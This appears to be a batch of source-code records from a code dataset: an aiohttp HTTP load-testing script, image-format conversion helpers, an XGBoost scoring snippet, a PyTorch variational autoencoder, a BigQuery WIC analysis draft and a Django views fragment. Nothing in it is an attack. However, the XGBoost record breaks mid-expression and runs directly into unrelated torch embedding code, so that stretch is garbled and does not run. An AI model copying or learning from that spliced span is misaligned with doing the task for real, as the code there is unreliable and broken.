+{"seq_id": "278185694", "text": "#!/usr/bin/env python3.5\n\n\nimport aiohttp\nimport argparse\nimport asyncio\nimport functools\nimport requests\nimport multiprocessing as mp\nimport time\n\nimport config\nfrom logger import *\n\n\nclass ReusedSession:\n \"\"\" Session for connect to a server. Reuse after return a response (for keep-alive)\n Parameters:\n session (aiohttp.ClientSession): session for connect\n working (bool): flag shows the session does not have work for server \n \"\"\"\n def __init__(self):\n self.session = aiohttp.ClientSession()\n self.working = False\n self.failed = False\n\n\ndef get_free_session(sessions, loggers):\n \"\"\" Find not working session for assign new work. Create new one if no available sessions\n Args:\n sessions (list)\n sessions.item (ReusedSession)\n Returns:\n ReusedSession\n \"\"\"\n LOG, LOG_ERR = loggers\n\n failed_session_num = []\n free_session = None\n for i, s in enumerate(sessions):\n if s.failed:\n failed_session_num.append(i)\n continue\n\n if not s.working:\n free_session = s\n break\n\n # Reverse sort for correct delete in array - index out of range\n failed_session_num = sorted(failed_session_num, reverse=True)\n for i in failed_session_num:\n #LOG.put( LogMsg(LN.err.FAIL_SESSION, time.time()) )\n sessions[i].session.close()\n del sessions[i]\n\n if free_session is not None:\n return free_session\n\n s = ReusedSession()\n sessions.append(s)\n #LOG.put( LogMsg(LN.info.NEW_SESSION, time.time()) )\n\n return s\n\n\ndef free_session(session, *args):\n \"\"\" Returns for session opportunity reused\n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n session.working = False\n\n\nasync def request(host, port, path, session, loggers):\n \"\"\" Requests server and wait response \n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n LOG, LOG_ERR = loggers\n\n request_url = \"http://\" + host + \":\" + port + path\n\n try:\n async with aiohttp.client._RequestContextManager(session.session._request(aiohttp.hdrs.METH_GET, request_url)) as resp:\n #LOG.put( LogMsg(LN.info.REQUEST, time.time()) )\n await resp.text()\n asyncio.sleep(1)\n except Exception as err:\n #LOG_ERR.put( LogMsg(LN.err.REQUEST, time.time()) )\n session.failed = True\n asyncio.sleep(1)\n\n\ndef calc_rate(time_since_start, limit_rate):\n \"\"\" Suppose we need reach `limit_rate` in some time\n Args:\n time_since_start (int): num of seconds since start\n limit_rate (int): max rate for perfomance test\n Returns:\n curr_rate (int): rate for current time\n \"\"\"\n init_rate = config.INIT_RATE\n step_rate = config.STEP_RATE\n\n rate = init_rate + time_since_start * step_rate\n\n return [round(rate), limit_rate][rate > limit_rate]\n\n\nasync def schedule_send_requests(loop, host, port, path, rate, loggers):\n \"\"\" Schedule envoke send_requests with calculated rate every second\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n reused_sessions = []\n it_num = -1\n \n while True:\n it_num += 1\n\n curr_rate = calc_rate(it_num, rate)\n task = loop.create_task( send_requests(loop=loop, host=host, port=port, path=path, rate=curr_rate, sessions=reused_sessions, loggers=loggers) )\n await asyncio.sleep(1)\n\n\nasync def send_requests(loop, host, port, path, rate, sessions, loggers):\n \"\"\" Sent requests for server 'host:port' with specified rate (rps)\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n for i in range(rate):\n session = get_free_session(sessions, loggers)\n session.working = True\n task = loop.create_task( request(host, port, path, session, loggers) )\n task.add_done_callback( functools.partial(free_session, session) )\n\n\ndef load(host, port, path, rate, loggers):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n schedule_send_requests(loop=loop, host=host, port=port, path=path, rate=rate, loggers=loggers))\n loop.close()\n\n\ndef parse_cmd():\n # for load simple nginx with sleep 1sec - the max for localhost 6processes x40 rate\n # beyond can't guarantee to maintain the level of rate (limit at cpu)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--rate\", type=int, required=True)\n parser.add_argument(\"--host\", type=str, required=True)\n parser.add_argument(\"--port\", type=str, required=True)\n parser.add_argument(\"--path\", type=str, required=True)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_cmd()\n load(args.host, args.port, args.path, args.rate, (None, None))\n", "sub_path": "loader/src/loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 4883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 23, "usage_type": "call"}, {"api_name": "aiohttp.client._RequestContextManager", "line_number": 88, "usage_type": "call"}, {"api_name": "aiohttp.client", "line_number": 88, "usage_type": "attribute"}, {"api_name": "aiohttp.hdrs", "line_number": 88, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "config.INIT_RATE", "line_number": 106, "usage_type": "attribute"}, {"api_name": "config.STEP_RATE", "line_number": 107, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 149, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 153, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 162, "usage_type": "call"}]} +{"seq_id": "213947405", "text": "#!/usr/bin/env python\n# encoding=utf8\n#########################################################################\n# Author:\n# Created Time: Thu 08 Nov 2018 08:48:39 PM CST\n# File Name: convert.py\n# Description: tensor pil cv numpy\n#########################################################################\n\nimport cv2\nimport numpy as np\nimport PIL\nimport torch\nfrom torchvision import transforms\n\n# tensor [C, H, W] 取值范围是[0, 1.0] 一般经过normalization\n# pil [H,W,C] 取值范围是[0,255] RGB\n# cv [H,W,C] 取值范围是[0,255] GBR\n\n# pil to numpy\n# np_obj = np.array( pil_obj )\n\n# numpy to pil i\n# pil_obj = PIL.Image.fromarray( np_obj ).convert('RGB')\n\n# tensor => numpy\n# np_obj = tensor.numpy()\n\n# numpy => tensor\n# tensor = torch.Tensor(np_obj)\n\n# pil to cv\n# cv_obj = np.array(pil_img)[:, :, ::-1].copy()\n\n# cv to pil\n# pil_obj = PIL.Image.fromarray(cv_obj.astype('uint8')[:, :, ::-1], mode='RGB')\n\n# tensor to pil\n# pil_img = transforms.ToPILImage()(tensor_obj).convert(\"RGB\")\n# = transpose + *255\n\ndef tensor_to_pil(tensor_img, MEAN=[], STD=[]):\n if MEAN and STD:\n np_img = tensor_img.numpy()\n for i in range(0, 3):\n np_img[i] = np_img[i] * STD[i] + MEAN[i] # unnormalize\n pil_img = transforms.ToPILImage()(torch.from_numpy(np_img)).convert(\"RGB\")\n else:\n pil_img = transforms.ToPILImage()(tensor_img).convert(\"RGB\")\n return pil_img\n\ndef tensor_to_cv(tensor_img, MEAN=[], STD=[]):\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n return cv_img\n\n\nif __name__ == '__main__':\n\n MEAN = [0.485, 0.456, 0.406]\n STD = [0.229, 0.224, 0.225]\n img_transform = transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor(), transforms.Normalize(MEAN, STD)])\n pil_img = PIL.Image.open(\"color.jpg\").convert(\"RGB\")\n\n # pil to tensor\n tensor_img = img_transform(pil_img)\n\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n pil_img.save(\"pil.jpg\")\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n cv2.imwrite(\"cv.jpg\", cv_img)\n", "sub_path": "mmcv/image/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 2079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torchvision.transforms.ToPILImage", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "648911782", "text": "from xgboost.sklearn import XGBClassifier as XGBoost\nimport numpy as np\nfrom sklearn.linear_model.logistic import LogisticRegression as LR\nfrom sklearn.metrics import accuracy_score,confusion_matrix,roc_auc_score,matthews_corrcoef\nfrom sklearn.model_selection import StratifiedKFold\ndef scores(y_test,y_pred,th=0.5):\n y_predlabel=[(0 if item max_norm).float() # ).squeeze()\n result_new = result / norm * norm_mask + result * (1 - norm_mask)\n #result[:,norm_mask,:] = result[:,norm_mask,:].div(norm[:,norm_mask,:])\n else:\n result_new = result\n\n # self.last_weight = weight.clone() # NOTE: waste of memory?\n\n return result_new\n\n def to_one_hot(self, input):\n # Returns a new tensor that doesn't share memory\n result = torch.index_select(\n self.ones, 0, input.view(-1).long()).view(\n input.size()+(self.depth,))\n result.requires_grad = self.requires_grad\n return result\n\n def __repr__(self):\n return self.__class__.__name__ + \"({})\".format(self.depth)\n\n \nclass VAE(nn.Module):\n def __init__(self):\n\n super(VAE, self).__init__()\n\n feats = 3\n embedding_size = 50\n layer_size = 400\n latent_size = 5\n\n self.feat_info = [[\"time\",'categ',745],['pulocation','categ',266],['dozone','categ',7],['cnt','real',1]]\n self.size_input = feats*50+1\n self.size_output = feats + 1\n self.alpha = 0.95\n self.gauss = 2\n ## Encoder Params\n\n # define a different embedding matrix for each feature\n self.feat_embedd = nn.ModuleList([nn.Embedding(c_size, embedding_size, max_norm=1)\n for _, col_type, c_size in self.feat_info\n if col_type==\"categ\"])\n\n self.fc1 = nn.Linear(self.size_input, layer_size)\n self.fc21 = nn.Linear(layer_size, latent_size)\n self.fc22 = nn.Linear(layer_size, latent_size)\n\n ## Decoder Params\n\n self.fc3 = nn.Linear(latent_size,layer_size)\n\n self.out_cat_linears = nn.ModuleList([nn.Linear(layer_size, c_size) if col_type==\"categ\"\n else nn.Linear(layer_size, c_size)\n for _, col_type, c_size in self.feat_info])\n\n self.logvar_x = nn.Parameter(torch.zeros(1,1).float())\n\n ## Other\n\n self.activ = nn.ReLU()\n\n self.logSoftmax = nn.LogSoftmax(dim=1)\n self.sigmoid = nn.Sigmoid()\n\n # define encoder / decoder easy access parameter list\n encoder_list = [self.fc1, self.fc21, self.fc22]\n self.encoder_mod = nn.ModuleList(encoder_list)\n if self.feat_embedd:\n self.encoder_mod.append(self.feat_embedd)\n\n self.encoder_param_list = nn.ParameterList(self.encoder_mod.parameters())\n\n decoder_list = [self.fc3, self.out_cat_linears]\n self.decoder_mod = nn.ModuleList(decoder_list)\n self.decoder_param_list = nn.ParameterList(self.decoder_mod.parameters())\n if len(self.logvar_x):\n self.decoder_param_list.append(self.logvar_x)\n\n\n def get_inputs(self, x_data):\n input_list = []\n cursor_embed = 0\n start = 0\n \n for feat_idx, ( _, col_type, feat_size ) in enumerate(self.feat_info):\n if col_type == \"categ\":\n aux_categ = self.feat_embedd[cursor_embed](x_data[:,feat_idx].long())#*drop_mask[:,feat_idx].view(-1,1)\n input_list.append(aux_categ)\n cursor_embed += 1\n \n elif col_type == \"real\": \n input_list.append((x_data[:,feat_idx]).view(-1,1).float())#*drop_mask[:,feat_idx]\n \n return torch.cat(input_list, 1)\n\n def encode(self, x_data):\n q_params = dict()\n input_values = self.get_inputs(x_data)\n fc1_out = self.fc1(input_values)\n h1_qz = self.activ(fc1_out)\n q_params['z'] = {'mu': self.fc21(h1_qz), 'logvar': self.fc22(h1_qz)}\n return q_params\n\n def sample_normal(self, q_params_z):\n if self.training:\n eps = torch.randn_like(q_params_z['mu'])\n std = q_params_z['logvar'].mul(0.5).exp_()\n return eps.mul(std).add_(q_params_z['mu'])\n else:\n return q_params_z['mu']\n\n def reparameterize(self, q_params):\n q_samples = dict()\n q_samples['z'] = self.sample_normal(q_params['z'])\n return q_samples\n\n def decode(self, z):\n p_params = dict()\n h3 = self.activ(self.fc3(z))\n out_cat_list = []\n\n for feat_idx, out_cat_layer in enumerate(self.out_cat_linears):\n if self.feat_info[feat_idx][1] == \"categ\": # coltype check\n out_cat_list.append(self.logSoftmax(out_cat_layer(h3)))\n elif self.feat_info[feat_idx][1] == \"real\":\n out_cat_list.append(out_cat_layer(h3))\n\n # tensor with dims (batch_size, self.size_output)\n p_params['x'] = torch.cat(out_cat_list, 1)\n p_params['logvar_x'] = self.logvar_x.clamp(-3,3)\n return p_params\n\n def forward(self, x_data, n_epoch=None):\n q_params = self.encode(x_data)\n q_samples = self.reparameterize(q_params)\n return self.decode(q_samples['z']), q_params, q_samples\n\n def loss_function(self, input_data, p_params, q_params, q_samples, clean_comp_only=False, data_eval_clean=False):\n\n \"\"\" ELBO: reconstruction loss for each variable + KL div losses summed over elements of a batch \"\"\"\n\n dtype_float = torch.cuda.FloatTensor\n nll_val = torch.zeros(1).type(dtype_float)\n # mixed datasets, or just categorical / continuous with medium number of features\n start = 0\n cursor_num_feat = 0\n\n for feat_select, (_, col_type, feat_size) in enumerate(self.feat_info):\n pi_feat = torch.sigmoid(q_params['w']['logit_pi'][:,feat_select]).clamp(1e-6, 1-1e-6)\n \n if clean_comp_only and data_eval_clean:\n pi_feat = torch.ones_like(q_params['w']['logit_pi'][:,feat_select])\n \n # compute NLL\n if col_type == 'categ':\n nll_val += nll_categ_global(p_params['x'][:,start:(start + feat_size)],\n input_data[:,feat_select].long(), feat_size, isRobust=True,\n w=pi_feat, isClean=clean_comp_only).sum()\n start += feat_size\n elif col_type == 'real':\n nll_val += nll_gauss_global(p_params['x'][:,start:(start + 1)], # 2\n input_data[:,feat_select],\n p_params['logvar_x'][:,cursor_num_feat], isRobust=True,\n w=pi_feat, isClean=clean_comp_only, \n std_0_scale=self.gauss).sum()\n start += 1 # 2\n cursor_num_feat +=1\n\n\n # kld regularizer on the latent space\n z_kld = -0.5 * torch.sum(1 + q_params['z']['logvar'] - q_params['z']['mu'].pow(2) - q_params['z']['logvar'].exp())\n\n # prior on clean cells (higher values means more likely to be clean)\n prior_sig = torch.tensor(self.alpha).type(dtype_float)\n\n # kld regularized on the weights\n pi_mtx = torch.sigmoid(q_params['w']['logit_pi']).clamp(1e-6, 1-1e-6)\n w_kld = torch.sum(pi_mtx * torch.log(pi_mtx / prior_sig) + (1-pi_mtx) * torch.log((1-pi_mtx) / (1-prior_sig)))\n\n loss_ret = nll_val + z_kld if clean_comp_only else nll_val + z_kld + w_kld\n\n return loss_ret, nll_val, z_kld, w_kld \n\n\n\n \n", "sub_path": "archived/RVAE_org_minimal/RVAE.py", "file_name": "RVAE.py", "file_ext": "py", "file_size_in_byte": 12049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.functional.nll_loss", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.set_grad_enabled", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 165, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 166, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 167, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 183, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.randn_like", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 263, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 299, "usage_type": "call"}]} +{"seq_id": "151601083", "text": "## This poc script for converting WIC R code to python\nyour_project_id = \"project-wic_poc\"\nimport pandas as pd\nfrom google.cloud import bigquery\nimport sys\nimport time\n\n## global variables\nprojectId = 'chmdev'\ndbName = 'DATASETCHM2021_D1'\ntableNamePrefix = ''\nmoduleName = ''\nyear = ''\ndbConn = bigquery.Client() ##global conn\n\n## decorator\ndef add_datetime(func):\n reVal = ''\n\n def wrapper():\n start = time.perf_counter()\n print(func.__name__, \" : method started\")\n func()\n print(func.__name__, \" : method stopped\")\n\n return reVal\n\n\n## create db connection\ndef get_db_conn():\n return bigquery.Client()\n\n\n## get the query to run\ndef get_query(tableNamePrefix):\n tableName = tableNamePrefix + '_' + year\n baseQuery = \"SELECT * FROM `\" + projectId + \".\" + dbName + \".\" + tableName + \"`\"\n return baseQuery\n\n\n## get specific query\n# @add_datetime\ndef specificQuery(cat):\n queryWhole = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a\n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip= b.ZipCode\"\"\"\n\n ### WIC data by catorgery\n ###Mom data\n queryMom = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a \n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode\n where a.certification_category in (1, 2, 3)\n \"\"\"\n\n ### Child data\n queryChild = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (5)\n \"\"\"\n ### Infant data\n queryInfant = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (4)\"\"\"\n\n ## National Risk Factor data\n queryNRF = \"\"\"SELECT * FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors`\"\"\"\n\n ## assigning appropriate query\n if(cat == 'all'):\n query = queryWhole\n elif(cat == 'mom'):\n query = queryMom\n elif(cat == 'child'):\n query = queryChild\n elif(cat == 'infant'):\n query = queryInfant\n elif(cat == 'nrf'):\n query = queryNRF\n\n return query\n\n\ndef run_SQL(dbConn, queryString):\n return dbConn.query(queryString).to_dataframe()\n\n## get indicators\ndef get_indicators():\n global dbConn\n queryInd = \"\"\"select case when VarCode='Currently.BF' then 'Currently_BF' when VarCode='Migrant.Status' then 'Migrant_Status'\n when VarCode='Ever.BF' then 'Ever_BF' else Varcode end as Ind \n from (select distinct varcode from `chmdev.DATASETCHM2021_D1.WIC_Codelookup`\n where Dataset= 'WIC' and VarType= 'Indicator' and Varcode \n not in ('FamilyIncome', 'Nutritional.Risk.check', 'Income.Period', 'NRFactor') order by Varcode asc )\"\"\"\n\n dfInd = run_SQL(dbConn,queryInd)\n return dfInd\n\n## get dimensions\ndef get_dimensions():\n global dbConn\n queryDim = \"\"\"select distinct Dim from (select case \n when Varcode in ('AgeRangeMoms', 'AgeRangeChild', 'AgeRangeInfant' ) then 'AgeRange' \n else Varcode end as Dim from `chmdev.DATASETCHM2021_D1.WIC_Codelookup` \n where Dataset= 'WIC' and VarType= 'Dimension' and Varcode not in ('NRFactor'))\"\"\"\n\n dfDim = run_SQL(dbConn,queryDim)\n return dfDim\n\n## get population estimates\ndef get_pop():\n global dbConn\n ##[['ZipCode','ChildPopulation','MomPopulation']]\n queryPop = \"\"\" select * from `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019`\"\"\"\n dfPop = run_SQL(dbConn, queryPop)\n dfPop['PopEstimates'] = dfPop['ChildPopulation'] + dfPop['MomPopulation']\n return dfPop\n\ndef get_riskf():\n global dbConn\n queryRisk = \"\"\" SELECT distinct RF_TYPE_RISK_FACTOR_TYPE_ID as col1 \n FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors` where HIGH_RISK_FLAG=1 \"\"\"\n\n dfRisk = run_SQL(dbConn,queryRisk)\n return dfRisk\n\ndef get_risk_factors(dfRisk):\n riskList = dfRisk.iloc[:,0].tolist()\n return riskList\n\n\ndef get_risk_counts(dfWICRisk):\n dfRiskMelt = pd.melt(dfWICRisk, id_vars=\"Family_zip\")\n\n # dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list()\n # kind of gather ***** check later\n ##dfCrossTabRisk = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list())\n\n # dfRiskMelt[1:10]\n\n # dfRiskSpreadOut = pd.crosstab(index=[dfRiskMelt['Family_zip'],dfRiskMelt['variable']], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = dfRiskSpreadOut.reset_index()\n dfRiskZipCountMelt = pd.melt(dfRiskSpreadOut, id_vars=[\"Family_zip\"], var_name='RiskID', value_name='Count')\n\n ## Do not delete these 2 comments\n dfRiskZipCountMelt = dfRiskZipCountMelt.sort_values(by=['Count'], ascending=False)\n # dfRiskZipCountMelt['Count_Denom'].sum()\n\n return dfRiskZipCountMelt\n\n## get totals for that zip in the data in WIC data\ndef get_zip_counts(dfWIC):\n dfWICZip = dfWIC[['Case_ID', 'Family_zip']]\n dfWICZipCounts = dfWICZip.groupby('Family_zip')['Family_zip'].count().reset_index(name='Zip_Counts')\n return dfWICZipCounts\n\n## get age unadjusted rates\ndef get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts):\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID',right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfZipCounts, left_on='Family_zip',right_on='Family_zip')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip','Count', 'CrossWalk','Zip_Counts']]\n dfFinal['Percentage'] = dfFinal['Count']/dfFinal['Zip_Counts']\n\n return dfFinal.drop_duplicates()\n\n## get age/population adjusted rates\ndef get_adjusted(dfWICNRF, dfRiskCount, dfPop):\n\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID', right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfPop, left_on='Family_zip', right_on='ZipCode')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip', 'Count', 'CrossWalk', 'PopEstimates', '']]\n dfFinal['Percentage'] = dfFinal['Count'] / dfFinal['PopEstimates']\n\n return dfFinal.drop_duplicates()\n\n\n## run the Stratification by Risk factors\ndef run_strat_rf():\n ## WIC whole\n query = specificQuery('all')\n dfWIC = run_SQL(dbConn, query)\n\n ##WIC NRF\n query = specificQuery('nrf')\n dfWICNRF = run_SQL(dbConn, query)\n\n ## getting the risk factors\n riskList = ['risk_1', 'risk_2', 'risk_3', 'risk_4', 'risk_5', 'risk_6', 'risk_7',\n 'risk_8', 'risk_9', 'risk_10', 'Family_zip']\n dfWICRisk = dfWIC[riskList]\n dfRiskCount = get_risk_counts(dfWICRisk)\n dfZipCounts = get_zip_counts(dfWIC)\n print(dfRiskCount.head())\n print(dfZipCounts.head())\n # m = ZIP counts\n # df = dfRisk counts\n # WIC_NRF\n dfUnadj = get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts)\n print(dfUnadj.head)\n dfAdj = get_adjusted(dfWICNRF, dfRiskCount, get_pop())\n print(dfAdj.head())\n\ndef run_wic_state_au():\n\n pass\n\n\ndef main():\n ## Steps\n \"\"\"\n 1. read the data from db\n 2. read the codelook ups\n 3. group/slice the data for respective sections\n 4. perform analysis - current version has 3 functions\n 5. ? add metadata\n 6. ? combine the results.\n :return:\n \"\"\"\n ## 1. function to run stratification by risk factor\n run_strat_rf()\n\n ## 2. function to run functions for combinations\n\n\n\n## main function\nif (__name__ == '__main__'):\n print(\"Script initiated\")\n main()\n print(\"Script ended\")\n\n\n\n\n\n\n", "sub_path": "wic_draft.py", "file_name": "wic_draft.py", "file_ext": "py", "file_size_in_byte": 8125, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.bigquery.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 14, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 21, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 31, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.melt", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "56638927", "text": "from django.shortcuts import render\nfrom django.shortcuts import render, Http404, get_object_or_404, HttpResponsePermanentRedirect\nfrom django.http import HttpResponse\nfrom models import Question, Answer\nfrom forms import AskForm, AnswerForm\nfrom django.core.paginator import Paginator\n\ndef test(request, page=2):\n return HttpResponse('

    '+page+'

